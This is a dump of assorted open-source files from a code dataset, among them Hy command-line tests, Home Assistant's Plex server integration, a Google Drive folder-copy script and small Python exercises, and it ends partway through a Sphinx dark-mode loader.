ext
stringclasses 9
values | sha
stringlengths 40
40
| content
stringlengths 3
1.04M
|
---|---|---|
py | 1a32e01ee80a59c41d5cc81611cb2b568ed1c691 | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
# Copyright 2018 the authors.
# This file is part of Hy, which is free software licensed under the Expat
# license. See the LICENSE.
import os
import re
import shlex
import subprocess
import pytest
from hy._compat import builtins
from hy.importer import get_bytecode_path
hy_dir = os.environ.get('HY_DIR', '')
def hr(s=""):
return "hy --repl-output-fn=hy.contrib.hy-repr.hy-repr " + s
def run_cmd(cmd, stdin_data=None, expect=0, dontwritebytecode=False):
env = dict(os.environ)
if dontwritebytecode:
env["PYTHONDONTWRITEBYTECODE"] = "1"
else:
env.pop("PYTHONDONTWRITEBYTECODE", None)
cmd = shlex.split(cmd)
cmd[0] = os.path.join(hy_dir, cmd[0])
p = subprocess.Popen(cmd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True,
shell=False,
env=env)
output = p.communicate(input=stdin_data)
assert p.wait() == expect
return output
def rm(fpath):
try:
os.remove(fpath)
except (IOError, OSError):
try:
os.rmdir(fpath)
except (IOError, OSError):
pass
def test_bin_hy():
run_cmd("hy", "")
def test_bin_hy_stdin():
output, _ = run_cmd("hy", '(koan)')
assert "monk" in output
output, _ = run_cmd("hy --spy", '(koan)')
assert "monk" in output
assert "\n Ummon" in output
# --spy should work even when an exception is thrown
output, _ = run_cmd("hy --spy", '(foof)')
assert "foof()" in output
def test_bin_hy_stdin_multiline():
output, _ = run_cmd("hy", '(+ "a" "b"\n"c" "d")')
assert "'abcd'" in output
def test_bin_hy_history():
output, _ = run_cmd("hy", '''(+ "a" "b")
(+ "c" "d")
(+ "e" "f")
(.format "*1: {}, *2: {}, *3: {}," *1 *2 *3)''')
assert "'*1: ef, *2: cd, *3: ab,'" in output
output, _ = run_cmd("hy", '''(raise (Exception "TEST ERROR"))
(+ "err: " (str *e))''')
assert "'err: TEST ERROR'" in output
def test_bin_hy_stdin_comments():
_, err_empty = run_cmd("hy", '')
output, err = run_cmd("hy", '(+ "a" "b") ; "c"')
assert "'ab'" in output
assert err == err_empty
_, err = run_cmd("hy", '; 1')
assert err == err_empty
def test_bin_hy_stdin_assignment():
# If the last form is an assignment, don't print the value.
output, _ = run_cmd("hy", '(setv x (+ "A" "Z"))')
assert "AZ" not in output
output, _ = run_cmd("hy", '(setv x (+ "A" "Z")) (+ "B" "Y")')
assert "AZ" not in output
assert "BY" in output
output, _ = run_cmd("hy", '(+ "B" "Y") (setv x (+ "A" "Z"))')
assert "AZ" not in output
assert "BY" not in output
def test_bin_hy_stdin_as_arrow():
# https://github.com/hylang/hy/issues/1255
output, _ = run_cmd("hy", "(as-> 0 it (inc it) (inc it))")
assert re.match(r"=>\s+2L?\s+=>", output)
def test_bin_hy_stdin_error_underline_alignment():
_, err = run_cmd("hy", "(defmacro mabcdefghi [x] x)\n(mabcdefghi)")
assert "\n (mabcdefghi)\n ^----------^" in err
def test_bin_hy_stdin_except_do():
# https://github.com/hylang/hy/issues/533
output, _ = run_cmd("hy", '(try (/ 1 0) (except [ZeroDivisionError] "hello"))') # noqa
assert "hello" in output
output, _ = run_cmd("hy", '(try (/ 1 0) (except [ZeroDivisionError] "aaa" "bbb" "ccc"))') # noqa
assert "aaa" not in output
assert "bbb" not in output
assert "ccc" in output
output, _ = run_cmd("hy", '(if True (do "xxx" "yyy" "zzz"))')
assert "xxx" not in output
assert "yyy" not in output
assert "zzz" in output
def test_bin_hy_stdin_unlocatable_hytypeerror():
# https://github.com/hylang/hy/issues/1412
# The chief test of interest here is the returncode assertion
# inside run_cmd.
_, err = run_cmd("hy", """
(import hy.errors)
(raise (hy.errors.HyTypeError '[] (+ "A" "Z")))""")
assert "AZ" in err
def test_bin_hy_stdin_bad_repr():
# https://github.com/hylang/hy/issues/1389
output, err = run_cmd("hy", """
(defclass BadRepr [] (defn __repr__ [self] (/ 0)))
(BadRepr)
(+ "A" "Z")""")
assert "ZeroDivisionError" in err
assert "AZ" in output
def test_bin_hy_stdin_hy_repr():
output, _ = run_cmd("hy", '(+ [1] [2])')
assert "[1, 2]" in output.replace('L', '')
output, _ = run_cmd(hr(), '(+ [1] [2])')
assert "[1 2]" in output
output, _ = run_cmd(hr("--spy"), '(+ [1] [2])')
assert "[1]+[2]" in output.replace('L', '').replace(' ', '')
assert "[1 2]" in output
# --spy should work even when an exception is thrown
output, _ = run_cmd(hr("--spy"), '(+ [1] [2] (foof))')
assert "[1]+[2]" in output.replace('L', '').replace(' ', '')
def test_bin_hy_ignore_python_env():
os.environ.update({"PYTHONTEST": '0'})
output, _ = run_cmd("hy -c '(print (do (import os) (. os environ)))'")
assert "PYTHONTEST" in output
output, _ = run_cmd("hy -m tests.resources.bin.printenv")
assert "PYTHONTEST" in output
output, _ = run_cmd("hy tests/resources/bin/printenv.hy")
assert "PYTHONTEST" in output
output, _ = run_cmd("hy -E -c '(print (do (import os) (. os environ)))'")
assert "PYTHONTEST" not in output
os.environ.update({"PYTHONTEST": '0'})
output, _ = run_cmd("hy -E -m tests.resources.bin.printenv")
assert "PYTHONTEST" not in output
os.environ.update({"PYTHONTEST": '0'})
output, _ = run_cmd("hy -E tests/resources/bin/printenv.hy")
assert "PYTHONTEST" not in output
def test_bin_hy_cmd():
output, _ = run_cmd("hy -c \"(koan)\"")
assert "monk" in output
_, err = run_cmd("hy -c \"(koan\"", expect=1)
assert "Premature end of input" in err
def test_bin_hy_icmd():
output, _ = run_cmd("hy -i \"(koan)\"", "(ideas)")
assert "monk" in output
assert "figlet" in output
def test_bin_hy_icmd_file():
output, _ = run_cmd("hy -i resources/icmd_test_file.hy", "(ideas)")
assert "Hy!" in output
def test_bin_hy_icmd_and_spy():
output, _ = run_cmd("hy -i \"(+ [] [])\" --spy", "(+ 1 1)")
assert "[] + []" in output
def test_bin_hy_missing_file():
_, err = run_cmd("hy foobarbaz", expect=2)
assert "No such file" in err
def test_bin_hy_file_with_args():
assert "usage" in run_cmd("hy tests/resources/argparse_ex.hy -h")[0]
assert "got c" in run_cmd("hy tests/resources/argparse_ex.hy -c bar")[0]
assert "foo" in run_cmd("hy tests/resources/argparse_ex.hy -i foo")[0]
assert "foo" in run_cmd("hy tests/resources/argparse_ex.hy -i foo -c bar")[0] # noqa
def test_bin_hyc():
_, err = run_cmd("hyc", expect=2)
assert "usage" in err
output, _ = run_cmd("hyc -h")
assert "usage" in output
path = "tests/resources/argparse_ex.hy"
output, _ = run_cmd("hyc " + path)
assert "Compiling" in output
assert os.path.exists(get_bytecode_path(path))
rm(get_bytecode_path(path))
def test_bin_hyc_missing_file():
_, err = run_cmd("hyc foobarbaz", expect=2)
assert "[Errno 2]" in err
def test_bin_hy_builtins():
# hy.cmdline replaces builtins.exit and builtins.quit
# for use by hy's repl.
import hy.cmdline # NOQA
# this test will fail if run from IPython because IPython deletes
# builtins.exit and builtins.quit
assert str(builtins.exit) == "Use (exit) or Ctrl-D (i.e. EOF) to exit"
assert type(builtins.exit) is hy.cmdline.HyQuitter
assert str(builtins.quit) == "Use (quit) or Ctrl-D (i.e. EOF) to exit"
assert type(builtins.quit) is hy.cmdline.HyQuitter
def test_bin_hy_main():
output, _ = run_cmd("hy tests/resources/bin/main.hy")
assert "Hello World" in output
def test_bin_hy_main_args():
output, _ = run_cmd("hy tests/resources/bin/main.hy test 123")
assert "test" in output
assert "123" in output
def test_bin_hy_main_exitvalue():
run_cmd("hy tests/resources/bin/main.hy exit1", expect=1)
def test_bin_hy_no_main():
output, _ = run_cmd("hy tests/resources/bin/nomain.hy")
assert "This Should Still Work" in output
@pytest.mark.parametrize('scenario', [
"normal", "prevent_by_force", "prevent_by_env"])
@pytest.mark.parametrize('cmd_fmt', [
'hy {fpath}', 'hy -m {modname}', "hy -c '(import {modname})'"])
def test_bin_hy_byte_compile(scenario, cmd_fmt):
modname = "tests.resources.bin.bytecompile"
fpath = modname.replace(".", "/") + ".hy"
cmd = cmd_fmt.format(**locals())
rm(get_bytecode_path(fpath))
if scenario == "prevent_by_force":
# Keep Hy from being able to byte-compile the module by
# creating a directory at the target location.
os.mkdir(get_bytecode_path(fpath))
# Whether or not we can byte-compile the module, we should be able
# to run it.
output, _ = run_cmd(cmd, dontwritebytecode=scenario == "prevent_by_env")
assert "Hello from macro" in output
assert "The macro returned: boink" in output
if scenario == "normal":
# That should've byte-compiled the module.
assert os.path.exists(get_bytecode_path(fpath))
elif scenario == "prevent_by_env":
# No byte-compiled version should've been created.
assert not os.path.exists(get_bytecode_path(fpath))
# When we run the same command again, and we've byte-compiled the
# module, the byte-compiled version should be run instead of the
# source, in which case the macro shouldn't be run.
output, _ = run_cmd(cmd)
assert ("Hello from macro" in output) ^ (scenario == "normal")
assert "The macro returned: boink" in output
def test_bin_hy_module_main():
output, _ = run_cmd("hy -m tests.resources.bin.main")
assert "Hello World" in output
def test_bin_hy_module_main_args():
output, _ = run_cmd("hy -m tests.resources.bin.main test 123")
assert "test" in output
assert "123" in output
def test_bin_hy_module_main_exitvalue():
run_cmd("hy -m tests.resources.bin.main exit1", expect=1)
def test_bin_hy_module_no_main():
output, _ = run_cmd("hy -m tests.resources.bin.nomain")
assert "This Should Still Work" in output
|
py | 1a32e021028be47b2bb507319f95eb726ab33659 | # MIT License
# Copyright (c) 2022 Zenitsu Prjkt™
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
def get_arg(message):
msg = message.text
msg = msg.replace(" ", "", 1) if msg[1] == " " else msg
split = msg[1:].replace("\n", " \n").split(" ")
if " ".join(split[1:]).strip() == "":
return ""
return " ".join(split[1:])
|
py | 1a32e077414381704f2c07ade73133b29c2efcc1 | # Marcelo Campos de Medeiros
# ADS UNIFIP
# Estrutura de Repetição
# 25/03/2020
'''
27 -Faça um programa que calcule o número médio de alunos por turma.
Para isto, peça a quantidade de turmas e a quantidade de alunos
para cada turma. As turmas não podem ter mais de 40 alunos.
'''
print('=' * 40)
print('{:=^40}'.format(" 'NÚMERO MÉDIO DE ALUNOS POR TURMA' "))
print('=' * 40, '\n')
turmas = int(input('Qual a quantidade de turmas: '))
soma = 0
for c in range(1, turmas + 1):
# para que a menssagem se repita caso informe < 40 alunos
while True:
alunos = int(input(f'{c}° turma tem quantos alunos: '))
if alunos <= 40:
break
else:
print('As turmas não podem ter mais de 40 alunos. Digite novamente.')
soma += alunos
print(f'A escola têm {turmas} turmas\n'
f'Com total de alunos de {soma}\n'
f'Assim a média de alunos por turma é {soma / turmas:2}') |
py | 1a32e08bcf6aa1922a6682412d4ec4cf8d9cda47 | """Shared class to maintain Plex server instances."""
import logging
import ssl
import time
from urllib.parse import urlparse
from plexapi.exceptions import NotFound, Unauthorized
import plexapi.myplex
import plexapi.playqueue
import plexapi.server
from requests import Session
import requests.exceptions
from homeassistant.components.media_player import DOMAIN as MP_DOMAIN
from homeassistant.components.media_player.const import (
MEDIA_TYPE_EPISODE,
MEDIA_TYPE_MUSIC,
MEDIA_TYPE_PLAYLIST,
MEDIA_TYPE_VIDEO,
)
from homeassistant.const import CONF_CLIENT_ID, CONF_TOKEN, CONF_URL, CONF_VERIFY_SSL
from homeassistant.core import callback
from homeassistant.helpers.debounce import Debouncer
from homeassistant.helpers.dispatcher import async_dispatcher_send
from .const import (
CONF_IGNORE_NEW_SHARED_USERS,
CONF_IGNORE_PLEX_WEB_CLIENTS,
CONF_MONITORED_USERS,
CONF_SERVER,
CONF_USE_EPISODE_ART,
DEBOUNCE_TIMEOUT,
DEFAULT_VERIFY_SSL,
DOMAIN,
PLAYER_SOURCE,
PLEX_NEW_MP_SIGNAL,
PLEX_UPDATE_MEDIA_PLAYER_SIGNAL,
PLEX_UPDATE_SENSOR_SIGNAL,
PLEXTV_THROTTLE,
X_PLEX_DEVICE_NAME,
X_PLEX_PLATFORM,
X_PLEX_PRODUCT,
X_PLEX_VERSION,
)
from .errors import NoServersFound, ServerNotSpecified, ShouldUpdateConfigEntry
_LOGGER = logging.getLogger(__name__)
# Set default headers sent by plexapi
plexapi.X_PLEX_DEVICE_NAME = X_PLEX_DEVICE_NAME
plexapi.X_PLEX_PLATFORM = X_PLEX_PLATFORM
plexapi.X_PLEX_PRODUCT = X_PLEX_PRODUCT
plexapi.X_PLEX_VERSION = X_PLEX_VERSION
class PlexServer:
"""Manages a single Plex server connection."""
def __init__(self, hass, server_config, known_server_id=None, options=None):
"""Initialize a Plex server instance."""
self.hass = hass
self._plex_account = None
self._plex_server = None
self._created_clients = set()
self._known_clients = set()
self._known_idle = set()
self._url = server_config.get(CONF_URL)
self._token = server_config.get(CONF_TOKEN)
self._server_name = server_config.get(CONF_SERVER)
self._verify_ssl = server_config.get(CONF_VERIFY_SSL, DEFAULT_VERIFY_SSL)
self._server_id = known_server_id
self.options = options
self.server_choice = None
self._accounts = []
self._owner_username = None
self._plextv_clients = None
self._plextv_client_timestamp = 0
self._plextv_device_cache = {}
self._use_plex_tv = self._token is not None
self._version = None
self.async_update_platforms = Debouncer(
hass,
_LOGGER,
cooldown=DEBOUNCE_TIMEOUT,
immediate=True,
function=self._async_update_platforms,
).async_call
# Header conditionally added as it is not available in config entry v1
if CONF_CLIENT_ID in server_config:
plexapi.X_PLEX_IDENTIFIER = server_config[CONF_CLIENT_ID]
plexapi.myplex.BASE_HEADERS = plexapi.reset_base_headers()
plexapi.server.BASE_HEADERS = plexapi.reset_base_headers()
@property
def account(self):
"""Return a MyPlexAccount instance."""
if not self._plex_account and self._use_plex_tv:
try:
self._plex_account = plexapi.myplex.MyPlexAccount(token=self._token)
except Unauthorized:
self._use_plex_tv = False
_LOGGER.error("Not authorized to access plex.tv with provided token")
raise
return self._plex_account
def plextv_clients(self):
"""Return available clients linked to Plex account."""
if self.account is None:
return []
now = time.time()
if now - self._plextv_client_timestamp > PLEXTV_THROTTLE:
self._plextv_client_timestamp = now
self._plextv_clients = [
x
for x in self.account.resources()
if "player" in x.provides and x.presence
]
_LOGGER.debug(
"Current available clients from plex.tv: %s", self._plextv_clients
)
return self._plextv_clients
def connect(self):
"""Connect to a Plex server directly, obtaining direct URL if necessary."""
config_entry_update_needed = False
def _connect_with_token():
available_servers = [
(x.name, x.clientIdentifier)
for x in self.account.resources()
if "server" in x.provides
]
if not available_servers:
raise NoServersFound
if not self._server_name and len(available_servers) > 1:
raise ServerNotSpecified(available_servers)
self.server_choice = (
self._server_name if self._server_name else available_servers[0][0]
)
self._plex_server = self.account.resource(self.server_choice).connect(
timeout=10
)
def _connect_with_url():
session = None
if self._url.startswith("https") and not self._verify_ssl:
session = Session()
session.verify = False
self._plex_server = plexapi.server.PlexServer(
self._url, self._token, session
)
def _update_plexdirect_hostname():
matching_servers = [
x.name
for x in self.account.resources()
if x.clientIdentifier == self._server_id
]
if matching_servers:
self._plex_server = self.account.resource(matching_servers[0]).connect(
timeout=10
)
return True
_LOGGER.error("Attempt to update plex.direct hostname failed")
return False
if self._url:
try:
_connect_with_url()
except requests.exceptions.SSLError as error:
while error and not isinstance(error, ssl.SSLCertVerificationError):
error = error.__context__ # pylint: disable=no-member
if isinstance(error, ssl.SSLCertVerificationError):
domain = urlparse(self._url).netloc.split(":")[0]
if domain.endswith("plex.direct") and error.args[0].startswith(
f"hostname '{domain}' doesn't match"
):
_LOGGER.warning(
"Plex SSL certificate's hostname changed, updating."
)
if _update_plexdirect_hostname():
config_entry_update_needed = True
else:
raise Unauthorized(
"New certificate cannot be validated with provided token"
)
else:
raise
else:
raise
else:
_connect_with_token()
try:
system_accounts = self._plex_server.systemAccounts()
except Unauthorized:
_LOGGER.warning(
"Plex account has limited permissions, shared account filtering will not be available."
)
else:
self._accounts = [
account.name for account in system_accounts if account.name
]
_LOGGER.debug("Linked accounts: %s", self.accounts)
owner_account = [
account.name for account in system_accounts if account.accountID == 1
]
if owner_account:
self._owner_username = owner_account[0]
_LOGGER.debug("Server owner found: '%s'", self._owner_username)
self._version = self._plex_server.version
if config_entry_update_needed:
raise ShouldUpdateConfigEntry
@callback
def async_refresh_entity(self, machine_identifier, device, session):
"""Forward refresh dispatch to media_player."""
unique_id = f"{self.machine_identifier}:{machine_identifier}"
_LOGGER.debug("Refreshing %s", unique_id)
async_dispatcher_send(
self.hass,
PLEX_UPDATE_MEDIA_PLAYER_SIGNAL.format(unique_id),
device,
session,
)
def _fetch_platform_data(self):
"""Fetch all data from the Plex server in a single method."""
return (
self._plex_server.clients(),
self._plex_server.sessions(),
self.plextv_clients(),
)
async def _async_update_platforms(self):
"""Update the platform entities."""
_LOGGER.debug("Updating devices")
available_clients = {}
ignored_clients = set()
new_clients = set()
monitored_users = self.accounts
known_accounts = set(self.option_monitored_users)
if known_accounts:
monitored_users = {
user
for user in self.option_monitored_users
if self.option_monitored_users[user]["enabled"]
}
if not self.option_ignore_new_shared_users:
for new_user in self.accounts - known_accounts:
monitored_users.add(new_user)
try:
devices, sessions, plextv_clients = await self.hass.async_add_executor_job(
self._fetch_platform_data
)
except (
plexapi.exceptions.BadRequest,
requests.exceptions.RequestException,
) as ex:
_LOGGER.error(
"Could not connect to Plex server: %s (%s)", self.friendly_name, ex
)
return
def process_device(source, device):
self._known_idle.discard(device.machineIdentifier)
available_clients.setdefault(device.machineIdentifier, {"device": device})
available_clients[device.machineIdentifier].setdefault(
PLAYER_SOURCE, source
)
if device.machineIdentifier not in ignored_clients:
if self.option_ignore_plexweb_clients and device.product == "Plex Web":
ignored_clients.add(device.machineIdentifier)
if device.machineIdentifier not in self._known_clients:
_LOGGER.debug(
"Ignoring %s %s: %s",
"Plex Web",
source,
device.machineIdentifier,
)
return
if device.machineIdentifier not in (
self._created_clients | ignored_clients | new_clients
):
new_clients.add(device.machineIdentifier)
_LOGGER.debug(
"New %s from %s: %s",
device.product,
source,
device.machineIdentifier,
)
for device in devices:
process_device("PMS", device)
def connect_to_resource(resource):
"""Connect to a plex.tv resource and return a Plex client."""
client_id = resource.clientIdentifier
if client_id in self._plextv_device_cache:
return self._plextv_device_cache[client_id]
client = None
try:
client = resource.connect(timeout=3)
_LOGGER.debug("plex.tv resource connection successful: %s", client)
except NotFound:
_LOGGER.error("plex.tv resource connection failed: %s", resource.name)
self._plextv_device_cache[client_id] = client
return client
for plextv_client in plextv_clients:
if plextv_client.clientIdentifier not in available_clients:
device = await self.hass.async_add_executor_job(
connect_to_resource, plextv_client
)
if device:
process_device("plex.tv", device)
for session in sessions:
if session.TYPE == "photo":
_LOGGER.debug("Photo session detected, skipping: %s", session)
continue
session_username = session.usernames[0]
for player in session.players:
if session_username and session_username not in monitored_users:
ignored_clients.add(player.machineIdentifier)
_LOGGER.debug(
"Ignoring %s client owned by '%s'",
player.product,
session_username,
)
continue
process_device("session", player)
available_clients[player.machineIdentifier]["session"] = session
new_entity_configs = []
for client_id, client_data in available_clients.items():
if client_id in ignored_clients:
continue
if client_id in new_clients:
new_entity_configs.append(client_data)
self._created_clients.add(client_id)
else:
self.async_refresh_entity(
client_id, client_data["device"], client_data.get("session")
)
self._known_clients.update(new_clients | ignored_clients)
idle_clients = (
self._known_clients - self._known_idle - ignored_clients
).difference(available_clients)
for client_id in idle_clients:
self.async_refresh_entity(client_id, None, None)
self._known_idle.add(client_id)
self._plextv_device_cache.pop(client_id, None)
if new_entity_configs:
async_dispatcher_send(
self.hass,
PLEX_NEW_MP_SIGNAL.format(self.machine_identifier),
new_entity_configs,
)
async_dispatcher_send(
self.hass,
PLEX_UPDATE_SENSOR_SIGNAL.format(self.machine_identifier),
sessions,
)
@property
def plex_server(self):
"""Return the plexapi PlexServer instance."""
return self._plex_server
@property
def accounts(self):
"""Return accounts associated with the Plex server."""
return set(self._accounts)
@property
def owner(self):
"""Return the Plex server owner username."""
return self._owner_username
@property
def version(self):
"""Return the version of the Plex server."""
return self._version
@property
def friendly_name(self):
"""Return name of connected Plex server."""
return self._plex_server.friendlyName
@property
def machine_identifier(self):
"""Return unique identifier of connected Plex server."""
return self._plex_server.machineIdentifier
@property
def url_in_use(self):
"""Return URL used for connected Plex server."""
return self._plex_server._baseurl # pylint: disable=protected-access
@property
def option_ignore_new_shared_users(self):
"""Return ignore_new_shared_users option."""
return self.options[MP_DOMAIN].get(CONF_IGNORE_NEW_SHARED_USERS, False)
@property
def option_use_episode_art(self):
"""Return use_episode_art option."""
return self.options[MP_DOMAIN].get(CONF_USE_EPISODE_ART, False)
@property
def option_monitored_users(self):
"""Return dict of monitored users option."""
return self.options[MP_DOMAIN].get(CONF_MONITORED_USERS, {})
@property
def option_ignore_plexweb_clients(self):
"""Return ignore_plex_web_clients option."""
return self.options[MP_DOMAIN].get(CONF_IGNORE_PLEX_WEB_CLIENTS, False)
@property
def library(self):
"""Return library attribute from server object."""
return self._plex_server.library
def playlist(self, title):
"""Return playlist from server object."""
return self._plex_server.playlist(title)
def create_playqueue(self, media, **kwargs):
"""Create playqueue on Plex server."""
return plexapi.playqueue.PlayQueue.create(self._plex_server, media, **kwargs)
def fetch_item(self, item):
"""Fetch item from Plex server."""
return self._plex_server.fetchItem(item)
def lookup_media(self, media_type, **kwargs):
"""Lookup a piece of media."""
media_type = media_type.lower()
if media_type == DOMAIN:
key = kwargs["plex_key"]
try:
return self.fetch_item(key)
except NotFound:
_LOGGER.error("Media for key %s not found", key)
return None
if media_type == MEDIA_TYPE_PLAYLIST:
try:
playlist_name = kwargs["playlist_name"]
return self.playlist(playlist_name)
except KeyError:
_LOGGER.error("Must specify 'playlist_name' for this search")
return None
except NotFound:
_LOGGER.error(
"Playlist '%s' not found", playlist_name,
)
return None
try:
library_name = kwargs["library_name"]
library_section = self.library.section(library_name)
except KeyError:
_LOGGER.error("Must specify 'library_name' for this search")
return None
except NotFound:
_LOGGER.error("Library '%s' not found", library_name)
return None
def lookup_music():
"""Search for music and return a Plex media object."""
album_name = kwargs.get("album_name")
track_name = kwargs.get("track_name")
track_number = kwargs.get("track_number")
try:
artist_name = kwargs["artist_name"]
artist = library_section.get(artist_name)
except KeyError:
_LOGGER.error("Must specify 'artist_name' for this search")
return None
except NotFound:
_LOGGER.error(
"Artist '%s' not found in '%s'", artist_name, library_name
)
return None
if album_name:
try:
album = artist.album(album_name)
except NotFound:
_LOGGER.error(
"Album '%s' by '%s' not found", album_name, artist_name
)
return None
if track_name:
try:
return album.track(track_name)
except NotFound:
_LOGGER.error(
"Track '%s' on '%s' by '%s' not found",
track_name,
album_name,
artist_name,
)
return None
if track_number:
for track in album.tracks():
if int(track.index) == int(track_number):
return track
_LOGGER.error(
"Track %d on '%s' by '%s' not found",
track_number,
album_name,
artist_name,
)
return None
return album
if track_name:
try:
return artist.get(track_name)
except NotFound:
_LOGGER.error(
"Track '%s' by '%s' not found", track_name, artist_name
)
return None
return artist
def lookup_tv():
"""Find TV media and return a Plex media object."""
season_number = kwargs.get("season_number")
episode_number = kwargs.get("episode_number")
try:
show_name = kwargs["show_name"]
show = library_section.get(show_name)
except KeyError:
_LOGGER.error("Must specify 'show_name' for this search")
return None
except NotFound:
_LOGGER.error("Show '%s' not found in '%s'", show_name, library_name)
return None
if not season_number:
return show
try:
season = show.season(int(season_number))
except NotFound:
_LOGGER.error(
"Season %d of '%s' not found", season_number, show_name,
)
return None
if not episode_number:
return season
try:
return season.episode(episode=int(episode_number))
except NotFound:
_LOGGER.error(
"Episode not found: %s - S%sE%s",
show_name,
str(season_number).zfill(2),
str(episode_number).zfill(2),
)
return None
if media_type == MEDIA_TYPE_MUSIC:
return lookup_music()
if media_type == MEDIA_TYPE_EPISODE:
return lookup_tv()
if media_type == MEDIA_TYPE_VIDEO:
try:
video_name = kwargs["video_name"]
return library_section.get(video_name)
except KeyError:
_LOGGER.error("Must specify 'video_name' for this search")
except NotFound:
_LOGGER.error(
"Movie '%s' not found in '%s'", video_name, library_name,
)
|
py | 1a32e0c22e295e4d79732d11656b55de218cae8c | from __future__ import print_function
import datetime
import time
import httplib2
import os
import sys
from apiclient import discovery
import oauth2client
from oauth2client import client
from oauth2client import tools
from oauth2client import file
from logbook import Logger, FileHandler, StreamHandler
log = Logger('copy-google-drive-folder')
try:
import argparse
flags = argparse.ArgumentParser(parents=[tools.argparser])
# add in our specific command line requirements
flags.add_argument('--source-folder_id', '-f', type=str, required=True,
help="Source Google Drive Folder ID (it's the end of the folder URI!) (required)")
flags.add_argument('--target-folder_id', '-t', type=str, required=True,
help="Target Google Drive Folder ID (it's the end of the folder URI!) (required)")
flags.add_argument('--page-size', '-p', type=int, default=100,
help="Number of files in each page (defaults to 100)")
flags.add_argument('--start-page', '-s', type=int, default=1,
help="start from page N of the file listing (defaults to 1)")
flags.add_argument('--end-page', '-e', type=int, default=None,
help="stop paging at page N of the file listing (defaults to not stop before the end)")
flags.add_argument('--log-dir', '-l', type=str, help='Where to put log files', default='/tmp')
flags.add_argument('--log-level', type=str, help='Choose a log level', default='INFO')
args = flags.parse_args()
except ImportError:
flags = None
# If modifying these scopes, delete your previously saved credentials
# at ~/.credentials/drive-python-quickstart.json
# SCOPES = 'https://www.googleapis.com/auth/drive.metadata.readonly'
SCOPES = 'https://www.googleapis.com/auth/drive'
CLIENT_SECRET_FILE = 'client_secret.json'
APPLICATION_NAME = 'Copy Google Drive Folders'
def get_credentials():
"""Gets valid user credentials from storage.
If nothing has been stored, or if the stored credentials are invalid,
the OAuth2 flow is completed to obtain the new credentials.
Returns:
Credentials, the obtained credential.
"""
home_dir = os.path.expanduser('~')
credential_dir = os.path.join(home_dir, '.credentials')
if not os.path.exists(credential_dir):
os.makedirs(credential_dir)
credential_path = os.path.join(credential_dir,
'drive-copy-google-folders.json')
store = oauth2client.file.Storage(credential_path)
credentials = store.get()
if not credentials or credentials.invalid:
flow = client.flow_from_clientsecrets(CLIENT_SECRET_FILE, SCOPES)
flow.user_agent = APPLICATION_NAME
if flags:
credentials = tools.run_flow(flow, store, args)
else: # Needed only for compatibility with Python 2.6
credentials = tools.run(flow, store)
log.info('Storing credentials to ' + credential_path)
return credentials
def ensure_trailing_slash(val):
if val[-1] != '/':
return "{}/".format(val)
return val
def main():
"""
Copy a folder from Source to Target
"""
log_filename = os.path.join(
args.log_dir,
'copy-google-drive-folder-{}.log'.format(os.path.basename(time.strftime('%Y%m%d-%H%M%S')))
)
# register some logging handlers
log_handler = FileHandler(
log_filename,
mode='w',
level=args.log_level,
bubble=True
)
stdout_handler = StreamHandler(sys.stdout, level=args.log_level, bubble=True)
with stdout_handler.applicationbound():
with log_handler.applicationbound():
log.info("Arguments: {}".format(args))
start = time.time()
log.info("starting at {}".format(time.strftime('%l:%M%p %Z on %b %d, %Y')))
credentials = get_credentials()
http = credentials.authorize(httplib2.Http())
drive_service = discovery.build('drive', 'v3', http=http)
# get the files in the specified folder.
files = drive_service.files()
request = files.list(
pageSize=args.page_size,
q="'{}' in parents".format(args.source_folder_id),
fields="nextPageToken, files(id, name, mimeType)"
)
page_counter = 0
file_counter = 0
while request is not None:
file_page = request.execute(http=http)
page_counter += 1
page_file_counter = 0 # reset the paging file counter
# determine the page at which to start processing.
if page_counter >= args.start_page:
log.info(u"######## Page {} ########".format(page_counter))
for this_file in file_page['files']:
file_counter += 1
page_file_counter += 1
log.info(u"#== Processing {} {} file number {} on page {}. {} files processed.".format(
this_file['mimeType'],
this_file['name'],
page_file_counter,
page_counter,
file_counter
))
# if not a folder
if this_file['mimeType'] != 'application/vnd.google-apps.folder':
# Copy the file
new_file = {'title': this_file['name']}
copied_file = drive_service.files().copy(fileId=this_file['id'], body=new_file).execute()
# move it to it's new location
drive_service.files().update(
fileId=copied_file['id'],
addParents=args.target_folder_id,
removeParents=args.source_folder_id
).execute()
else:
log.info(u"Skipped Folder")
else:
log.info(u"Skipping Page {}".format(page_counter))
# stop if we have come to the last user specified page
if args.end_page and page_counter == args.end_page:
log.info(u"Finished paging at page {}".format(page_counter))
break
# request the next page of files
request = files.list_next(request, file_page)
log.info("Running time: {}".format(str(datetime.timedelta(seconds=(round(time.time() - start, 3))))))
log.info("Log written to {}:".format(log_filename))
if __name__ == '__main__':
main()
|
py | 1a32e0c662c8657caf6e6188fae220df2ffb18dc | from pathlib import Path
class DarkModeLoader:
def __init__(self):
self.config = None
def configure(self, app, config):
self.config = config
self.check_sphinx_theme()
if not self.config.html_static_path:
self.config.html_static_path = [
str(Path.joinpath(Path(__file__).resolve().parent, "static"))
]
else:
self.config.html_static_path.append(
str(Path.joinpath(Path(__file__).resolve().parent, "static"))
)
if not self.config.default_dark_mode:
self.load_default_theme("light")
self.load_css()
return
self.load_default_theme("dark")
self.load_css()
def check_sphinx_theme(self):
if not self.config.html_theme == "sphinx_rtd_theme":
self.config.html_theme = "sphinx_rtd_theme"
def load_default_theme(self, default_theme: str):
if not self.config.html_js_files:
self.config.html_js_files = [
"dark_mode_js/default_{default_theme}.js".format(
default_theme=default_theme
),
